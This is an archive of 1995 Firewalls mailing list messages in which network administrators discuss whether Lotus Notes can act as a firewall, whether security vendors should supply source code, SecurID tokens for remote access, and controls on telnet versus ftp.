From firewalls-owner Mon May 1 00:08:58 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA25633 for firewalls-outgoing; Sun, 30 Apr 1995 23:55:04 -0700
Received: from ibmmail.COM (ibmmail.com [199.171.26.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id XAA25628 for ; Sun, 30 Apr 1995 23:55:01 -0700
Message-Id: <199505010655.XAA25628@miles.greatcircle.com>
Received: from IBMMAIL.COM by ibmmail.COM (IBM VM SMTP V2R3) with BSMTP id 2013; Mon, 01 May 95 02:55:11 EDT
Date: Mon, 01 May 1995 02:55:10 EDT
From: " Phil Daniels DLSPPJ - AMPLN1 "
To: keithw@tp.com
Cc: firewalls@greatcircle.com
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Subject: LOTUS NOTES
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

===========================================================================
>>I am a novice in the firewall arena but hopefully not for long. I thought I
>>read somewhere that Lotus Notes can be used to implement a firewall to a
>>certain degree. Is this true? If so, can someone point me to possible sources?

Keith,

What you might have read about is the Compuserve Lotus Notes service. As I recall they "download" newsgroups & possibly mailing lists into Lotus Notes databases which subscribers replicate into their local Notes space. A similar service is offered by WorldCom.

I imagine that Compuserve may well position this service as a means via which you can avoid the complexities of firewalls, DMZ's etc, and if you are a big Notes user that could have some truth. BTW I am sending this from Lotus Notes.

Phil Daniels
---
] the trick is to rock the boat enough to get           AMP Society
] everyone a wet but not so much as to sink the ship.   Australia
--
Sender : Keith Wong, Application Engineer
Company: Thru-Put Systems, Inc.
Phone  : (407) 423-8969
FAX    : (407) 423-7021
---- End of mail text
This item has been forwarded from Internet.
The SMTP headers from the original item follow:
Received: from relay2.UU.NET by ibmmail.COM (IBM VM SMTP V2R3) with TCP; Sun, 30 Apr 95 19:12:57 EDT
Received: from miles.greatcircle.com by relay2.UU.NET with ESMTP id QQyntj24284; Sun, 30 Apr 1995 18:59:44 -0400
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA11029 for firewalls-outgoing; Sun, 30 Apr 1995 13:34:43 -0700
Received: from hp710.tp.com ((199.100.159.4)) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA11024 for ; Sun, 30 Apr 1995 13:34:40 -0700
Message-Id: <199504302034.NAA11024@miles.greatcircle.com>
Received: by hp710.tp.com (1.38.193.4/15.6) id AA27284; Sun, 30 Apr 1995 16:33:39 -0500
Mailer: Elm (revision: 70.85)
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk
Author: I5004693
Composed: 01/05/95 09:19
Updated by: Phil Daniels on: 01/05/95 16:16

From firewalls-owner Mon May 1 01:38:50 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA27236 for firewalls-outgoing; Mon, 1 May 1995 01:29:42 -0700
Received: from po.gis.prc.com (po.gis.prc.com [140.188.128.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id BAA27231 for ; Mon, 1 May 1995 01:29:39 -0700
Message-ID:
Date: 1 May 1995 04:29:38 -0500
From: "Server #7000007"
Subject: Undeliverable Mail
X-Mailer: Mail*Link SMTP/MS 3.0.0
Apparently-To:
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Unknown Microsoft mail form. Approximate representation follows.

Message: Firewalls-Digest V4 #276
Sent: Sun, Apr 30, 1995 4:19 AM
To: Harris Tom
On Server: PRC Bellevue NE MS
Date: Mon, May 1, 1995 4:29 AM
Reason: Could not be delivered because the destination Microsoft Mail server could not be found.
From firewalls-owner Mon May 1 05:11:32 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA29146 for firewalls-outgoing; Mon, 1 May 1995 05:03:58 -0700
Received: from erenj.com (ereapp.ERENJ.COM [159.70.31.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id FAA29141 for ; Mon, 1 May 1995 05:03:54 -0700
Posted-Date: Mon, 1 May 1995 08:04:12 -0400
From: "Bryan D. Boyle"
Message-Id: <9505010804.ZM3403@maverick.erenj.com>
Date: Mon, 1 May 1995 08:04:12 -0400
In-Reply-To: Christopher Klaus "Re: TRUST US" (Apr 28, 7:50pm)
References: <199504282350.TAA24442@shadow.net>
X-Phone: (908) 730-3338
X-Saying: Strange problems call for strange solutions.
X-Face: "Pd&4kXWsi"3Hc_Y~I-ts24DN$w~Hh)&L-P9DZvE"~_~m),~Y&N_]TUIM*4.r@z$SxVL]}v=+IP>Fuq{zx%{KKj"Kys1Q5{|m*l}:[T;N:/=@5[xOIpR$%skp$f0#6^j\1+ -?l%Yk/+S8Y!3J@{~!Ao4-COV:Ft}{]oZ&1=!@<>UIh2s
X-Mailer: Z-Mail (3.2.0 06sep94)
To: firewalls@greatcircle.com
Subject: Re: TRUST US
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Apr 28, 7:50pm, Christopher Klaus wrote:
>
> Well, you do not see many companies refusing to use most of the software
> packages that do not include source. I guess a lot of people don't mind
> mistrusting their software, ie Netscape, Windows and almost any decent word
> processor.

There is, by no stretch of the imagination, no way Netscape, WinDoze, or any decent word processor could be called a mission critical piece of security software. Nor any way, based on experiences with the various products, that I would use them as a way to run a protection/security/logging platform.

We have all been working around problems with Bill Gate$ "releases" not meeting the "vision" since mbasic 4.3 (at least....anyone remember the paper tape release...???)

******rest of message deleted*********

--
Bryan D. Boyle               |The Moving Finger writes, and having writ, moves on.
#include                     |Nor all your Piety nor Wit can call it back to cancel
EMAIL: bdboyle@erenj.com     |Half a line, or all your tears wash out a Word of it.
--------------http://www.access.digex.net/~bdboyle/index.html---------------

From firewalls-owner Mon May 1 05:39:09 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA29439 for firewalls-outgoing; Mon, 1 May 1995 05:23:11 -0700
Received: from relay2.UU.NET (relay2.UU.NET [192.48.96.7]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id FAA29434 for ; Mon, 1 May 1995 05:23:07 -0700
Received: from ds9.lis.cch.com by relay2.UU.NET with SMTP id QQynvl10111; Mon, 1 May 1995 08:23:15 -0400
Received: by ds9.lis.cch.com id AA28045; Mon, 1 May 95 08:21:24 EDT
Received: from unknown(165.181.149.10) by ds9.lis.cch.com via smap (V1.3) id sma028043; Mon May 1 08:20:58 1995
Received: by deathstar.lis.cch.com (AIX 3.2/UCB 5.64/4.03) id AA75139; Mon, 1 May 1995 08:23:11 -0400
From: doc@deathstar.lis.cch.com (Matthew J. D'Errico)
Message-Id: <9505011223.AA75139@deathstar.lis.cch.com>
Subject: Re: LOTUS NOTES
To: auampwrv@ibmmail.com (Phil Daniels DLSPPJ - AMPLN1)
Date: Mon, 1 May 1995 08:23:11 -0400 (EDT)
Cc: keithw@tp.com, firewalls@greatcircle.com
In-Reply-To: <199505010655.XAA25628@miles.greatcircle.com> from "Phil Daniels DLSPPJ - AMPLN1" at May 1, 95 02:55:10 am
X-Mailer: ELM [version 2.4 PL24]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 1665
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Phil Daniels DLSPPJ - AMPLN1 wrote...
> >>I am a novice in the firewall arena but hopefully not for long. I
> thought I
> >>read somewhere that Lotus Notes can be used to implement a firewall to a
> >>certain degree. Is this true? If so, can someone point me to possible
> sources?
> Keith,
> What you might have read about is the Compuserve Lotus Notes service.
> As I recall they "download" newsgroups & possibly mailing lists into Lotus
> Notes databases which subscribers replicate into their local Notes space.
> A similar service is offered by WorldCom.
>
> I imagine that Compuserve may well position this service as a means via
> which you can avoid the complexities of firewalls, DMZ's etc, and if you
> are a big Notes user that could have some truth, BTW I am sending this
> from Lotus Notes.

I think the reference is to Lotus' hype regarding their forthcoming "InterNotes" which will provide not only an email gateway, but the ability to browse Web documents using the Notes v4 interface, as well as build Web documents using the Notes document design tools.

There's been significant mis-information propagated by Lotus with regard to "Firewall" facilities. I say misinformation because they imply very strongly that InterNotes will act as a firewall for your Internet activities. Outside of the obvious security walls between the Notes facilities and the Internet, there's no proof, nor documentation, that InterNotes will provide the facilities of a good firewall outside of the Notes realm, i.e.: Bastion Host, Packet Filtering, etc.

-- Doc

From firewalls-owner Mon May 1 06:09:06 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA29413 for firewalls-outgoing; Mon, 1 May 1995 05:21:11 -0700
Received: from relay2.pipex.net (relay2.pipex.net [158.43.128.4]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id FAA29408 for ; Mon, 1 May 1995 05:21:06 -0700
Received: from smtpgty.saicuk.co.uk by bath.pipex.net with SMTP (PP); Mon, 1 May 1995 13:21:14 +0100
Received: by smtpgty.saicuk.co.uk with Microsoft Mail id <2FA4DE07@smtpgty.saicuk.co.uk>; Mon, 01 May 95 13:11:35 GMT
From: "Johnson-Bryden, Ian"
To: "'Firewalls@GreatCircle.COM'"
Subject: Re: TRUST US?
(Getting Source)
Date: Mon, 01 May 95 11:54:00 GMT
Message-ID: <2FA4DE07@smtpgty.saicuk.co.uk>
Encoding: 134 TEXT
X-Mailer: Microsoft Mail V3.0
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

*Shrink Wrap Vendors

Therefore the shrink-wrap vendors believe themselves to have final responsibility for security. They don't want to be held responsible for screw-ups by end-users altering their software. They have also innovated and want to earn revenue from their innovations. They have many customers so the needs of individual customers aren't all that important. They can force some to wait for fixes to various problems and for ports to new OS's.

Depends on the vendor and on the customer. Very effective security products are available, such as trusted OS and RDBMS, which are not available as source code. However, the products provide users with the capability to make changes through configuration without changing the base product code. Some of these products are highly configurable. That enables the vendor to have the product evaluated and endorsed/certified by an organisation such as NCSC or an ITSEC CLEF, but still leaves the user with the ability and responsibility to produce a custom system solution.

*External Consultants

Aren't doing much innovation. They are responsible for customization at the site, and need access to some configuration tools. In essence, they value-add other parties' packages. They seek the safety of being able to blame the vendor. They are most interested in the two layer (security, config) approach discussed earlier.

That depends on the consultant and the customer brief to the consultant. Many consultants working the Inet market are primarily UNIX specialists and may have very limited experience of risk/security. Some consultants are highly experienced in risk analysis and the development of risk policies which might be confined to IT, or could extend to the complete spectrum of risk analysis including things like personnel policies.
In between there are many flavours of risk. Selecting the most appropriate type of consultant can be difficult and some government agencies maintain registers of skills and clearances which are updated through experience to assist departments in making that selection. Although these lists are often restricted, some information may be available outside of government. In some cases, a consultant listed in this way may be very good in the government environment but be unfamiliar with the cultures outside.

Very often a consultant is prevented from being innovative because of the way in which the client has drafted the brief. For example, the client may have decided to buy a particular type of 'firewall' product and the consultant's brief is simply to support or carry out the implementation within those constraints. If the client draws up a multi-part requirement which calls for the consultant to analyse corporate risks and recommend options, starting with a full corporate assessment and then progressing through a series of elements against specific milestones, the consultant could be very innovative and effective.

*Internal IS

Knows that the real responsibility lies with them. They are incredibly concerned about each detail of the software on their system. They are doing the maintenance and know that their head is on the block if things break. They feel the need to know everything that is going on and they need to have bug fixes yesterday. It is Internal IS that most wants source.

The corporate user should always accept responsibility at least in a strategic and executive sense. That doesn't necessarily mean that the user needs access to product at every level. If a government agency is buying a truck they may spend many man months investigating the vendor and examining every part of his production and quality management systems.
Before an order is placed rain forests of documentation will be produced and specify right down to the paint number and the temperature at which it is applied. They may insist on inspecting each stage of production from raw material. A commercial organisation usually looks at a range of competitive products, maybe takes a test drive, but accepts that the truck manufacturer knows more than they do about how the materials are processed and assembled and they simply can't justify the time and cost of closely supervising vendor and product. The other aspect to this is legal liabilities. If the customer takes delivery of the truck and then decides to make changes to its structure without the experience built up by the vendor, all sorts of horrible complications can follow.

Given these needs how about a component solution:

Software vendors: Rather than packaging monolithic tools, vendors distribute small testable pieces. They can show that each of these pieces works and can therefore avoid some blame for end-user configuration problems.

That already happens and is one of the principles behind security criteria. Each building block is evaluated and ticketed at the appropriate level. However, that does not mean that the use of, say, B1 components to build a system results in the system being B1. To complete the picture it is necessary to run accreditation and to examine not only the IT hardware and software, but also all the other factors such as personnel selection, mandated procedures etc.

Security Consultants are responsible for integrating the pieces (knowing that each is secure). Security consultants are responsible for keeping up with news relating to all security products and keeping their clients informed.

That depends on what the consultant's brief is. It could be that several different consultants are employed at each stage of the process from risk analysis to system implementation.
They may also be engaged to carry out audits after implementation to ensure that the risk management policy still meets reality and needs and that the policy is being enforced. One problem which can surface is that a consultant concentrates on a niche and, although very good and current in that area, may not know about a development outside the niche which makes existing approaches obsolete.

Internal IS: Gets pieces they know work (thanks to the vendor), in an observable and (hopefully) reliable configuration thanks to the consultant. The Internal IS can swap individual pieces as necessary because the pieces are functionally easy to understand. They get updates about problems and prospective fixes. Since the pieces are easy to understand, the consultants can replace them with other pieces as bugs are discovered.

There are vendors who already provide products and services of this type. One approach which has also been employed for many years is the issue of media without detailing the reasons for the change. Whether this is desirable or undesirable, the reason was that it avoided the identification of security weaknesses which could be exploited by an attacker and was a customer requirement rather than something promoted by any vendors. It was intended to protect those users who were slow to execute bug fixes for whatever reason and would otherwise have presented a window of opportunity should an attacker act faster. Every user has to take a view on this, but it is one potential risk of bug discussion on public BBSs where an attacker may be faster to use the information of a vulnerability than the victims are in acting on the information. One possible risk is that the attack is carried out by an unhappy member of the IS team before security walks him out the door for some other reason and before anyone else has plugged the hole. How you view that depends on your knowledge of company morale and how paranoid you happen to be.
It can also be an argument against holding source in that an employee could make changes to the security system which allow him to attack after he has left the company and for that attack to avoid the audit trail.

Ian J-B

From firewalls-owner Mon May 1 06:38:12 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA29997 for firewalls-outgoing; Mon, 1 May 1995 05:52:56 -0700
Received: from alpha.xerox.com (alpha.Xerox.COM [13.1.64.93]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id FAA29992 for ; Mon, 1 May 1995 05:52:53 -0700
Received: from trevor ([13.252.80.2]) by alpha.xerox.com with SMTP id <14510(3)>; Mon, 1 May 1995 05:53:06 PDT
Received: from Galaxy (galaxy.henr.mc.xerox.com) by trevor (4.1/SMI-4.1) id AA02969; Mon, 1 May 95 08:53:01 EDT
Date: Mon, 1 May 1995 05:53:01 PDT
From: joep@ia.mc.xerox.com (Joe Pennell)
Message-Id: <9505011253.AA02969@trevor>
To: woods@ncar.ucar.edu
Subject: Re: Secure Modem Pool
Cc: Firewalls@greatcircle.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Let me rephrase my original comments to avoid confusion. The menu-driven admin may be a pain, but the feature that I particularly like is the pinpoint control on access. Prior to installing the SecurID, we had been using a password protection mechanism on a terminal server. When a notice of termination came flying across the desk at 4:30 on a Friday, we had to change the password, and notify all remote users so that those with weekend operations could function. Talk about a royal pain. It turned out to be a trade-off, but one that we didn't mind too much. It all goes back to how many remote users you have, and how remote they are.

The other comment you noted, the one about the PIN, I made a vague comment, sorry. Yes, you do need the password on the front of the card in addition to your PIN. My point was that the requirement for a unique PIN was annoying.
As your system starts to "fill up" new users encounter more errors as they try to choose a number that is left. I am not particularly fond of anyone knowing what a legal PIN number is, even though they don't know who has the card.

As far as the TRUST US war, everyone on this list would probably LOVE to have the time to sit down and develop their own security from scratch. Reality says that sometimes we can, and sometimes we have to rely on others. The trick is to find help that you think you can trust, because you may not have time to sit down and review everything for yourself.

joep@ia.mc.xerox.com

From firewalls-owner Mon May 1 07:17:20 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA00992 for firewalls-outgoing; Mon, 1 May 1995 06:46:51 -0700
Received: from brimstone.soscorp.com (soscorp.soscorp.com [204.52.248.130]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA00986 for ; Mon, 1 May 1995 06:46:47 -0700
Received: from fearless.soscorp.com (fearless.soscorp.com [204.52.249.130]) by brimstone.soscorp.com ($Revision: 2.8 $/8.6.12/8.6.4.287) with BSMTP id BS0020687/JAA20691; Mon, 1 May 1995 09:42:01 -0400
Received: from dauntless.soscorp.com (dauntless.soscorp.com [204.52.249.141]) by fearless.soscorp.com (8.6.10/8.6.4.287) with ESMTP id JAA14465; Mon, 1 May 1995 09:41:19 -0400
From: ari@soscorp.com (Ari Shamash)
Received: by dauntless.soscorp.com (8.6.10/SMI-4.1) id JAA25661; Mon, 1 May 1995 09:41:16 -0400
Date: Mon, 1 May 1995 09:41:16 -0400
Message-Id: <199505011341.JAA25661@dauntless.soscorp.com>
To: Abraham Lui
Cc: firewalls@GreatCircle.COM
Subject: Telnet and Ftp
In-Reply-To: <199504281933.AA263327628@hpindda.cup.hp.com>
References: <199504281933.AA263327628@hpindda.cup.hp.com>
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>>>>> On Fri, 28 Apr 1995 12:33:47 -0700, Abraham Lui said:

Abraham> A while back Marcus Ranum had circulated in this
Abraham> mailing list on how to transfer a file
Abraham> through a remote login session (eg. rlogin or telnet). I am
Abraham> surprised to see that some firewall products out there
Abraham> still provide separate access control on telnet and
Abraham> ftp. Using Marcus's technique, denying ftp but
Abraham> allowing telnet does not make any sense!

By that token, you can FTP a file via email. Does that mean that FTP access should be tied to email access? Or better yet, you can run PPP on top of email (no flames please, it is technically possible, if not practical). Does that mean that SLIP/PPP access and email access should be tied together as well?

Once you allow data in any form to cross your firewall, you inevitably allow many forms of access through your firewall, but with varying degrees of difficulty. IMHO, it takes a certain amount of sophistication on the user's part to run PPP over email, whereas it doesn't take much to run Fetch on a Mac and bring files over.

The bottom line is: What security policy are you trying to implement? What are you protecting against? That has to be answered before a solution can be found.

Ari Shamash
SOS Corporation

From firewalls-owner Mon May 1 07:46:26 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA01735 for firewalls-outgoing; Mon, 1 May 1995 07:12:19 -0700
Received: from lmux02.ssc.siemens.com (ssc.siemens.com [192.132.51.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id HAA01730 for ; Mon, 1 May 1995 07:12:01 -0700
Received: by lmux02.ssc.siemens.com (5.65/Ultrix3.0-C) id AA07717; Mon, 1 May 1995 10:14:29 -0400
Date: Mon, 1 May 1995 10:14:28 -0400 (EDT)
From: Kent Wiggins
Subject: Re: Lotus Notes for a firewall?
To: "Keith L.
Wong"
Cc: Fire Walls
In-Reply-To: <199504302034.NAA11024@miles.greatcircle.com>
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

There is a document called the Lotus Notes Interface Cookbook which I got from our Notes guru here. It is dated Feb 8th, so the info might be a little old. In it, it says you can get a copy at:

ftp://ftp.notes.net/pub/faq/notesfaq.txt (text)
-or-
ftp://ftp.notes.net/pub/faq/notesfaq.nsf (notes format, I think)
http://www.notes.net

In section 11.0, they tell you how to use Notes through an existing firewall. Option one is to get your security administrator to allow TCP/IP port 1352 through your router. Option 2, "for the more technically inclined ...", recommends using the plugboard proxy from TIS (gee, what a concept :-).

In section 11.1, they tell you how to set up Notes as its own firewall. Option one is a dual-homed (meaning it has two ethernet cards) configuration. After telling you how to do it, they then tell you, and I quote, "..., we do not recommend it because it relies on how well the underlying operating system is configured, tested, and maintained." Option two has the Notes server on an isolated LAN, using a serial connection back to the inside to replicate the databases. They recommend this method.

/=======================================================================\
| Kent Wiggins                 | Voice: (407)942-5148                   |
| Principal Systems Programmer | Fax: (407)942-6874                     |
| Siemens Stromberg-Carlson    | work: okw@ssc.siemens.com              |
| Lake Mary, Florida           | private: wiggins@magicnet.net          |
\=======================================================================/

On Sun, 30 Apr 1995, Keith L. Wong wrote:

> Hi,
>
> I am a novice in the firewall arena but hopefully not for long. I thought I read
> somewhere that Lotus Notes can be used to implement a firewall to a certain
> degree. Is this true? If so, can someone point me to possible sources?
>
> Thanks much,
> Keith
>
> --
> Sender : Keith Wong, Application Engineer
> Company: Thru-Put Systems, Inc.
> Phone  : (407) 423-8969
> FAX    : (407) 423-7021
>

From firewalls-owner Mon May 1 08:03:37 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA01297 for firewalls-outgoing; Mon, 1 May 1995 06:55:52 -0700
Received: from inet-gw-1.pa.dec.com (inet-gw-1.pa.dec.com [16.1.0.22]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA01292 for ; Mon, 1 May 1995 06:55:49 -0700
Received: from vbv03.vbv.dec.com by inet-gw-1.pa.dec.com (5.65/24Feb95) id AA18871; Mon, 1 May 95 06:50:30 -0700
Received: by vbv03.vbv.dec.com (5.65/MS-012594); id AA02028; Mon, 1 May 1995 09:50:28 -0400
Message-Id: <9505011350.AA02028@vbv03.vbv.dec.com>
To: firewalls@greatcircle.com
Subject: Re: Source Code
In-Reply-To: Your message of "Sun, 30 Apr 95 03:34:17 EDT."
Date: Mon, 01 May 95 09:50:27 -0400
From: "Frank Byrum"
X-Mts: smtp
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

It was written:

>The major use I have for source code is adding minor new functions and
>altering old functions to provide different logging, slightly different
>functionality, adaption to a changing environment, etc.
>
>I think that source code is far more common and necessary in an
>environment without captive vendors. For example, Windows source is
>essentially unnecessary because Microsoft monopolizes the market. If
>source was out there, it wouldn't help because they would change it all
>in the next generation to keep the vendors in line. IBM mainframe
>source is similarly closely held in much the same way, and it is not
>really an impediment to mainframe operations.
>
>In the Unix environment, source is needed because there are so many
>different development lines that compiling everything for every version
>is very expensive.
>Since there is no dominant market force, vendors
>cannot force you to take their software, and source code provides the
>only means of doing maintenance on many of the development lines. I run
>a bunch of obscure Unix packages that I have run for 15+ years,
>compiling them for 3B2s, Suns, Interactive Unix, FreeBSD, and SCO Unix
>at various times, and porting them as OS versions came out with other
>advantages.
>
>Source code is far more useful in performing security-related and
>systems administration functions than in many other fields. For
>example, adding special logging to most applications is done in the user
>code, while adding logging to a network interface for security purposes
>is an OS modification that cannot be done at the user code level. About
>7 years ago, I modified a version of the Unix shell to add integrity
>features - impossible to do practically without the source, but
>something a normal user would never need or wish to do. I made a
>special version of the Find command for some reason or another, again an
>important change for systems administration, but not the sort of thing a
>user would ever need to do.
>
>In other words, normal users don't do many things that require source
>code, while systems admins and info-sec experts do. That's why we want
>source code all the time, and those users don't get it.

I find the fact that people want to modify source code interesting. I might be able to forgive changing code for logging or adding additional logging, but the fact does remain that this code is used to secure a site. And even if you read the code and think that you understand the code and have considered the code's interaction with other subsystems--you could still introduce a new bug. (This is not saying that the code writers might not do the same--but they are responsible for their work). But this does pose a problem: what if the designers redesign the security code, what do you do then?
Who is responsible if your change causes a security problem? Or better yet, what if your changes have some ripple effect on some other subsystem and an issue that was not a problem before now becomes a security hole. Trying to support changes like this can become a real problem. I have seen many people who try to modify code of this nature and make a real mess of things. Mostly because their understanding was not complete.

Even though we include source code with our distribution, I would not suggest that anyone make changes. It gets real hard to try to support a product and changes as well. I can not guarantee that any changes that are made will work in the next version. And we really don't have the time to debug people's code. If there are changes needed, I would rather have that information placed in the engineering process so we can include the functionality in the next release. That way there is true support for the change and if there are problems we can deal with them.

Frank

From firewalls-owner Mon May 1 08:12:14 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA01850 for firewalls-outgoing; Mon, 1 May 1995 07:20:51 -0700
Received: from gateway.damark.com (GATEWAY.DAMARK.COM [204.17.145.230]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA01845 for ; Mon, 1 May 1995 07:20:46 -0700
Received: by gateway.damark.com; id JAA13946; Mon, 1 May 1995 09:18:37 -0500
Received: from sco.damark.com(172.31.254.231) by gateway.damark.com via smap (V1.3) id sma013944; Mon May 1 09:18:23 1995
Received: by damark.com (5.65/1.2-eef) id AA14723; Mon, 1 May 95 09:19:17 -0500
Message-Id: <9505011419.AA14723@damark.com>
From: "william.wells"
To: FIREWALLS
Subject: FW: TRUST US
Date: Mon, 01 May 95 09:14:00 PDT
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

This is a composite response to several threads floating around. The "threads" are samples of common thoughts.
Thread 1:
> The problem no one mentions is that firewalling is a business now which
> means we have to support our products, and if someone takes the code and
> makes fundamental changes in the product leading to a failure it damages the
> reputation of the product and our company. Plus how could we be expected to
> support a product when we don't know what changes to the code the customer
> has made?

yeah! Just look at how much damage was done to the Unix marketplace because of source availability.

Thread 2:
> how seriously they take them. Sun is getting better. HP is a good
> counter example where the company doesn't provide src and you do
> not hear many people complaining HPUX being so insecure, even tho the
> occasional vulnerability appears from time to time.

HPUX? The system that in 1994 ships with a /bin/sh that is Svr2 vintage (well, has all the bugs that Svr2's sh had), that has default tty edit chars that assume we all still use real ttys (I mean teletypes), the system that ships a diff that does not know -c ...

Thread 3:
I think that source code is far more common and necessary in an environment without captive vendors. For example, Windows source is essentially unnecessary because Microsoft monopolizes the market. If source was out there, it wouldn't help because they would change it all in the next generation to keep the vendors in line. IBM mainframe source is similarly closely held in much the same way, and it is not really an impediment to mainframe operations.

My comments-

It seems to me that the real problem here is that Unix doesn't have a central clearing house for official source and that vendors are competing for market share so are trying to add their "we're better than everyone else" features. In other mail, people are saying "I have this new program which is better than xxxx".
In the commercial world, especially if source was properly managed, the change would be submitted to the official source team who would review its merits and incorporate it into the official release. So, instead of having many special versions of things, you have 1 which is official. From my listening, it appears that 'sendmail' works this way. There is a version which is "official". Sites can twist it any way they choose but there is still an official release. (Where is that 'src' anyway?)

As for "we're better" syndrome, I have no way of knowing if the sendmail I get with HP/UX has any relationship with the latest version on the Internet. A month back, I asked about how to enable the 'round-robin' feature of DNS; since HP appears to have their own version of everything and they don't tie it into the 'src' version, I still don't know if I can "turn it on". Source would immediately (relatively speaking) answer those questions.

The other reason for having source is that it allows you to "see" the hidden features of the systems. "Rumor" has it that Microsoft has hidden features in Windows which their software exploits to the disadvantage of third-party developers. I've called DEC on problems and they say, "run this undocumented program" or "set this undocumented parameter". I've been on some systems where there was an undocumented and unlogged system ID for allowing the vendor to dial in and check (this hasn't happened for a while- I hope). At previous jobs, we routinely reassembled the systems from source. Occasionally, we'd hit a program where our binary and the released binary didn't jibe: some "test" code wasn't removed or some "quick fix" added. I don't mind having "vendor special" code in my systems, I mind terribly not knowing about them. It scares me when I mistype a command and get a response of "xxxxx completed".

So, how does this relate to firewalls- my final reason for source.
It allows us to add site specific security checks which I don't expect the vendor to add. For example, we have some internal eMail addresses which we do not want accessible from outside. The easiest way to handle it was to add a filter at the most logical point; the single point where all eMail passes. We also have a problem with case-sensitivity with eMail- again, a simple tweak. One of the ways to handle security is to add special 'trips'; this can be done in a variety of ways- source is one.

From firewalls-owner Mon May 1 08:55:41 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA03426 for firewalls-outgoing; Mon, 1 May 1995 08:33:12 -0700 Received: from lmux02.ssc.siemens.com (ssc.siemens.com [192.132.51.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA03421 for ; Mon, 1 May 1995 08:33:08 -0700 Received: by lmux02.ssc.siemens.com (5.65/Ultrix3.0-C) id AA08242; Mon, 1 May 1995 11:35:35 -0400
Date: Mon, 1 May 1995 11:35:34 -0400 (EDT)
From: Kent Wiggins
Subject: Re: Lotus Notes for a firewall? - Oops, typo!
To: keithw@tp.com
Cc: firewalls@greatcircle.com
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Just realized I made a typo in my previous post. The document's name is Lotus Notes InterNET Cookbook, not Lotus Notes InterFACE Cookbook. Sorry about that.
/=======================================================================\
| Kent Wiggins                  | Voice: (407)942-5148                 |
| Principal Systems Programmer  | Fax: (407)942-6874                   |
| Siemens Stromberg-Carlson     | work: okw@ssc.siemens.com            |
| Lake Mary, Florida            | private: wiggins@magicnet.net        |
\=======================================================================/

From firewalls-owner Mon May 1 10:10:41 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA03362 for firewalls-outgoing; Mon, 1 May 1995 08:26:43 -0700 Received: from maily1.prodigy.com (maily1.prodigy.com [192.207.105.55]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA03357 for ; Mon, 1 May 1995 08:26:40 -0700 Received: (from frank@localhost) by maily1.prodigy.com (8.6.10/8.6.9) id LAA23477; Mon, 1 May 1995 11:53:06 -0400
Date: Mon, 1 May 1995 11:53:06 -0400 (EDT)
From: Frank Wortner
To: ted@gw.lsli.com
cc: firewalls@GreatCircle.COM
Subject: RE: TRUST US and other hooui
In-Reply-To:
Message-ID:
X-Mail-1: Prodigy Services Co.
X-Mail-2: 1565 Front Street
X-Mail-3: Yorktown Heights NY 10598
X-Phone: 1-914-448-1740
X-FAX: 1-914-448-1946
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Fri, 28 Apr 1995 ted@gw.lsli.com wrote:

> If a client is willing to sign some
> non-disclosure agreements, we are willing to allow them to examine the code.

A commendable and not at all unreasonable stance. In fact, an offer to review design specifications and the controls implemented to make sure that the product meets those specs might be even more useful and interesting.

> ... how could we be expected to support a product when we don't know
> what changes to the code the customer has made?

A problem, but one that is hardly unique to your product, or in fact to the computer industry.
